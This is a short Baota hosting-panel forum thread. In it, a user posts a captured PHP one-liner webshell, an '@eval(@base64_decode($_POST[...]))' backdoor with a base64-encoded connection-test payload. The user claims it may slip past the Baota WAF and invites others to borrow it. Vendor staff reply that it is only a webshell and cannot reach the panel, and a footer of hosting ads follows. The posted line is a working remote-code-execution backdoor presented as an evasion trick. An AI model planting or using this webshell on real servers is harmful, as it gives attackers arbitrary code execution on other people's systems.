【已解答】防火墙问题

v0a11740615496=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMGVjYjQiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjQ3MDk2NTY4YjdhIjt9b2Jfc3RhcnQoKTt0cnl7ZWNobyAiN2xlOG5qOHE1NTVuenIxanp2ZzgiOzt9Y2F0Y2goRXhjZXB0aW9uICRlKXtlY2hvICJFUlJPUjovLyIuJGUtPmdldE1lc3NhZ2UoKTt9O2Fzb3V0cHV0KCk7ZGllKCk7&shadow=@eval(@base64_decode($_POST[v0a11740615496]));

今天实战，发现的疑似可以过宝塔waf的php一句话，你们借鉴一下看看，base64解码后看

666123666 · 发表于 2021-8-17 18:39:26

证据.............

hsxnet · 发表于 2021-8-18 10:21:33

F׾4랸？

谢花郎 · 发表于 2021-8-18 10:29:25

您好，宝塔WAF只对木马连接进行拦截。不会对你服务器内的文件进行拦截。

666123666 · 发表于 2021-8-18 13:46:59

谢花郎发表于 2021-8-18 10:29
您好，宝塔WAF只对木马连接进行拦截。不会对你服务器内的文件进行拦截。

不是拦截，这样子不是可以随便进别人宝塔吗，绕过任何安全验证

宝塔技术-小强 · 发表于 2021-8-18 14:38:58

这个只是webshell。进不去面板的

█ 菠萝云-免费装宝塔,4G内存68 █	速智云-高性能高防服务器/五折起	★香港CN2云/站群/高防/特价机★	【个人信息保护的调研问卷】	【多途云】高防CDN
高防服务器，无视一切流量攻击	A7招租，联系qq394030111	OV/EV SSL证书，可当日签发	【阿里云】宝塔一键部署，5.5折	宝塔一键部署DV,EV,OV,SSL证书
█ 易探云·香港/美国vps仅9元 █	高防CDN全球节点99元\|服务器29元	★香港VPS首月免费★续费68元★	【阿里云】2核2G，3M，45.1元/年	在线网站测速、批量PING运维工具